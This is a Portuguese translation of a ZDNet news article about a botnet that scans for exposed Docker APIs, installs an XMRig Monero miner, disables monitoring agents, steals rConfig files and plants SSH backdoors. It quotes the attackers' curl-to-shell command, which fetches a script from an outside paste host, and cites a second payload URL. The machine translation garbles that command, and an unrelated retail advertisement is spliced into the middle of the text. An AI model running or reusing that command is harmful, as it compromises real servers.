Atualmente, um grupo de hackers faz uma varredura em massa na Internet, procurando plataformas Docker que possuem terminais de API expostos on-line.
O objetivo dessas varreduras é permitir que o grupo de hackers envie comandos para a instância do Docker e implante um minerador de criptomoeda nas instâncias do Docker de uma empresa , para gerar fundos para os próprios lucros do grupo.
UMA OPERAÇÃO PROFISSIONAL
Essa operação de varredura em massa em particular começou no fim de semana, em 24 de novembro, e imediatamente se destacou devido ao seu tamanho.
“Os usuários da API CTI da Bad Packets observam que a atividade de exploração direcionada às instâncias expostas do Docker não é novidade e acontece com bastante frequência”, disse hoje à ZDNet Troy Mursch, diretor de pesquisa e co-fundador da Bad Packets LLC.
“O que diferenciou esta campanha foi o grande aumento da atividade de digitalização. Isso justificou uma investigação mais aprofundada para descobrir o que essa botnet estava fazendo”, disse ele.
“Como outros observaram [ 1 , 2 ], essa não é sua tentativa comum de exploração infantil de scripts”, disse Mursch, que descobriu a campanha. “Houve um nível moderado de esforço nessa campanha e ainda não analisamos completamente tudo o que faz até o momento”.
O QUE SABEMOS ATÉ AGORA
O que sabemos até agora é que o grupo por trás desses ataques atualmente está verificando mais de 59.000 redes IP (netblocks) procurando instâncias expostas do Docker.
Se a corrida entre os gigantes corporativos Amazon, Microsoft e Walmart para criar experiências de compras totalmente automatizadas for alguma indicação, o varejo poderá parecer muito diferente no futuro próximo.
Mas os consumidores estão prontos para mudanças na experiência do tijolo e argamassa? Descubra o que os consumidores estão usando durante as compras, se tornou a experiência de compra mais fácil (ou mais difícil) e quais informações os consumidores estão dispostos a desistir em troca de promoções ou descontos especiais.Downloads fornecidos por TechRepublic.com
Depois que o grupo identifica um host exposto, os atacantes usam o ponto de extremidade da API para iniciar um contêiner Alpine Linux OS, onde executam o seguinte comando:
chroot / mnt / bin / sh -c ‘curl -sL4 http://ix.io/1XQa | bater;
O comando acima baixa e executa um script Bash no servidor do invasor. Este script instala um minerador de criptomoeda XMRRig clássico. Nos dois dias desde que a campanha está ativa, os hackers já extraíram 14,82 moedas Monero (XMR), no valor de pouco mais de US $ 740, observou Mursch.
Além disso, essa operação de malware também vem com uma medida de autodefesa.
“Uma função não original mas interessante da campanha é que ela desinstala os agentes de monitoramento conhecidos e mata vários processos por meio de um script baixado de http: // ix [.] Io / 1XQh”, disse Mursch.
Examinando esse script, não apenas vemos que os hackers estão desativando produtos de segurança, mas também estão encerrando processos associados a botnets rivais de mineração de criptomoedas, como DDG .
Além disso, Mursch também descobriu uma função do script mal-intencionado que verifica um host infectado em busca de arquivos de configuração do rConfig , que ele criptografa e rouba, enviando os arquivos de volta ao servidor de comando e controle do grupo.
Além disso, Craig H. Rowland, fundador da Sandfly Security, também notou que os hackers também estão criando contas de backdoor nos contêineres invadidos e deixando as chaves SSH para trás para facilitar o acesso e uma maneira de controlar todos os bots infectados de um local remoto.
Por enquanto, Mursch recomenda que usuários e organizações que executam instâncias do Docker verifiquem imediatamente se estão expondo terminais de API na Internet, fechem as portas e finalizem contêineres em execução não reconhecidos.
FONTE: ZDNET